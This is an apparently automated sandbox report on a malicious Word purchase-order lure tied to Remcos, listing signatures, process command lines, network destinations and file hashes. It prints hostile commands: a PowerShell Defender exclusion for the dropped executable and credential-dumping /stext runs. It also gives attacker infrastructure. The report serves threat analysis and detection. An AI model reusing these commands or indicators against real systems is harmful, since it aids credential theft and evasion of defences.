Analysis Overview
SHA256
64d86549103287f488f4086139984d1be9781da6b6efc7902f03a348e664164c
Threat Level: Known bad
The file PO 00082811.docx.doc was found to be: Known bad.
Malicious Activity Summary
Remcos
Detected Nirsoft tools
NirSoft MailPassView
Credentials from Password Stores: Credentials from Web Browsers
NirSoft WebBrowserPassView
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Launches Equation Editor
Checks processor information in registry
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Enumerates system info in registry
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 09:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 09:09
Reported
2024-08-09 09:12
Platform
win7-20240708-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Abuses OpenXML format to download file from external location
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2112 set thread context of 904 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 2508 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 1516 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
| PID 904 set thread context of 2220 | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | C:\Users\Admin\AppData\Roaming\fkslfile21.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\fkslfile21.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO 00082811.docx"
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
"C:\Users\Admin\AppData\Roaming\fkslfile21.exe"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\owzsr"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\zyekrjup"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\zyekrjup"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\jsrvstfjnkqv"
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
C:\Users\Admin\AppData\Roaming\fkslfile21.exe /stext "C:\Users\Admin\AppData\Local\Temp\jsrvstfjnkqv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | asmlholdings.top | udp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.179.131:80 | c.pki.goog | tcp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 104.21.65.25:443 | asmlholdings.top | tcp |
| US | 212.162.149.80:2404 | tcp | |
| US | 212.162.149.80:2404 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.16.170.49:80 | crl.microsoft.com | tcp |
Files
memory/2976-0-0x000000002FF31000-0x000000002FF32000-memory.dmp
memory/2976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-2-0x000000007124D000-0x0000000071258000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
| MD5 | 76ca99c232272f8eba8fb42bcbd6f8b4 |
| SHA1 | c9f78f83b6bf53c7aa8165080c02ddb29931407c |
| SHA256 | 73efa1fc62f44bab3aaae79eb1aa5c6b9eae0e996207a4fd8109cc4efe12a50f |
| SHA512 | a966cee4770971768df979ab31998758341a4692998394edc2f17eab257d61c5a3e2131e84803ecfdca05e1dcfec4fd846506aa281b0ca4b8f895640b8896ba9 |
C:\Users\Admin\AppData\Local\Temp\{09ABBF4E-A3B0-4E9E-8437-B1D743D1821E}
| MD5 | ed62ad47597553c189bd5cf09f5ca7e4 |
| SHA1 | 65eb35d0663cd947fe767f83f96107fee5fd596d |
| SHA256 | 22be7873ff5060f840269f911c6c20c3afd77e6279b31b45aea07338e7f2af19 |
| SHA512 | 31eeb1af3f22faa542527fbdc2f3928ee9410877b23245dc9d3ec2fc2ffa49b6c6e3ab69eaf5cace6af62e493e91b409b5f4503732bd0ffdd30450b149fd0a29 |
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2D10BE76-1712-4575-B3A1-6CCA930A57BB}.FSD
| MD5 | d5f67793d59f0331b72bb5689486e6df |
| SHA1 | 0a2cb10289ca361b4dd84faa3e64e9e37ae5f13d |
| SHA256 | 50921d1a029d2533e67748915261568be22871c20d43eb79da17fbfe2be81666 |
| SHA512 | a7df6e7e2c896f04f915edac5d65fee9bdf7d75c0dc9783d413b781cbafa6828836a00ca103253502c136e4a630bb00aa4846258fba45ef926ea0e5e32fa3b27 |
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
| MD5 | 02182dd04c30e71ff8e8a9bdd049854e |
| SHA1 | 7ede6685b5335da445ed545ca38f8bed8351adda |
| SHA256 | 536674718e4c70fdc4082523b6f2450be31cee66340eefa24f88501395350bec |
| SHA512 | 1269087a90496b038a1a2c6af95fc5e847ae5034c7bed23799173cdff7205ecbc90de37e11b7912c93b749c24e3205443aede1706151f272c0310078dce3cfd6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\eWjsdnqwKllAbeP[1].doc
| MD5 | f7e4812fd83625cdfe19159f6d2fefa9 |
| SHA1 | 15a20c40783e01f60135619b8358d1f1df0beb14 |
| SHA256 | fa22ac754b94cc3093cad88b03f0d2b1aa4b4c52a494c7a0b1db761acffbb5e7 |
| SHA512 | 51bfab21f0d18c4c7bcdfff776cb771949bdf29f43dab37767fb6d7cc64bb8996d730b39aa949b5f12d991dcd1e7cbbd953301581877bf165fd03c5ed33ef23d |
C:\Users\Admin\AppData\Local\Temp\CabCD9B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 971c514f84bba0785f80aa1c23edfd79 |
| SHA1 | 732acea710a87530c6b08ecdf32a110d254a54c8 |
| SHA256 | f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895 |
| SHA512 | 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
| MD5 | 8117ef283f8c3b7fbc82866ce09051f8 |
| SHA1 | 10c506db72a600858cb688125785e8729a1c95b2 |
| SHA256 | d7c859d434643ae90eb12a8d3831d4d93988d3caf165a03b30c2f7968ce8ac7a |
| SHA512 | 4e487daec6e1197cffb5651f5e9d06f129a3d6dc404fe8de2dafa0daef03af57481c8b82d62d7166c74d92da348ae8d9b01debe26012ac9fe957d23416abee23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | 7fb5fa1534dcf77f2125b2403b30a0ee |
| SHA1 | 365d96812a69ac0a4611ea4b70a3f306576cc3ea |
| SHA256 | 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f |
| SHA512 | a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
| MD5 | c81af9eba1799dbea4cd8341d8081f12 |
| SHA1 | bc59dd9c68cf82ad5a3ce1807b9fa365aad30542 |
| SHA256 | 57b01bd008ef7aa7037c887f9a28843236a5fa2e72b4404a1de6f809e9d25f62 |
| SHA512 | 3ba3032aa3ba1b44be7fe66d02c1b11d58358d127e2a1914a901b0c081dd5cce41ae5e52ed5eee337399cb465759e834b23ee496823f889008dde2d67ba4cc93 |
C:\Users\Admin\AppData\Roaming\fkslfile21.exe
| MD5 | 7b1741b5341b1cd8293ac7a054bfc1e0 |
| SHA1 | 80b5a55aefd1385e6d87b776af30e12efeb026dc |
| SHA256 | dc63815bd59981625914b0f9e0699b93d6c7e40020ff738a8c44a49c4f7afcd4 |
| SHA512 | 0f9f0489b3abbc77da870882306a0967071dc35f543e8da80d582a2c1765548a80fe4854b87934f34239b2ae4fa1e44485ead934036b1793fbc947327398a07e |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 9afb4156fa5814747c97dc5fc166473b |
| SHA1 | 1cf3168eba7c2ced7d3d881f29425ea85c392241 |
| SHA256 | ea8d899f248ad0eb602639ce80b6a4af9967151e4c1099da750ece5085e23775 |
| SHA512 | 0811aecc4768c531814d9b99b041651dd50d545cfecc189e7f5fae352b5bd9fa36f15a98730c6e3eb67c41cb528ad31f2c07eea38784d186ff083fb13bc7d96a |
memory/2112-121-0x0000000000180000-0x000000000027E000-memory.dmp
memory/2112-127-0x0000000001E00000-0x0000000001E1A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2112-139-0x0000000001E70000-0x0000000001E86000-memory.dmp
memory/2112-138-0x0000000001E60000-0x0000000001E6E000-memory.dmp
memory/2112-140-0x00000000057F0000-0x00000000058B0000-memory.dmp
memory/904-145-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-147-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-167-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-166-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-163-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-162-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-157-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-155-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-153-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-151-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-149-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-160-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-143-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-159-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/904-170-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-171-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-172-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-173-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-175-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2508-179-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1516-184-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2508-192-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2220-194-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2220-193-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2220-190-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1516-188-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1516-187-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2508-182-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2976-201-0x000000007124D000-0x0000000071258000-memory.dmp
memory/904-202-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-206-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-205-0x0000000010000000-0x0000000010019000-memory.dmp
memory/904-207-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-212-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-211-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 05c935742d496328d65a234026135c2e |
| SHA1 | 1098096ee5770d53a1978e859bc7db121dd3901d |
| SHA256 | b9a1bc4b475bba4c1308d4a984480450c7928fa93402d3b825bd5f81afa0fe67 |
| SHA512 | eb6399ee5c70d5e5da33442ab042b6a91f2d8facc35c0c11fd63b9ffcd981d2fa1f0f32f6ea60ea5fb4535030284ae2542d9e60f3e6398075196f6a3a64b9373 |
memory/904-220-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-219-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-227-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-228-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 375a982b4b4ebb05d3509053d296ecf4 |
| SHA1 | 978efdb5c3760c6bd3b8383b7aacb58b4f23de79 |
| SHA256 | 624e96f15a561e2b6f89e202562686096510c15d57f6a41f40d645cf2cf7fea3 |
| SHA512 | f945bca4e2061cc9fcf5cf788ea9ba53dc6bbe0a03f6edc3576e0d85c7abea09ba19888e24548eec94ad781371adda2210e0c4003a0bf61ebdde6e635ff36198 |
memory/2976-251-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-252-0x000000007124D000-0x0000000071258000-memory.dmp
memory/904-260-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-259-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 09:09
Reported
2024-08-09 09:12
Platform
win10v2004-20240802-en
Max time kernel
101s
Max time network
109s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeAuditPrivilege | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO 00082811.docx" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | asmlholdings.top | udp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.179.131:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 221.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.16.167.138:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
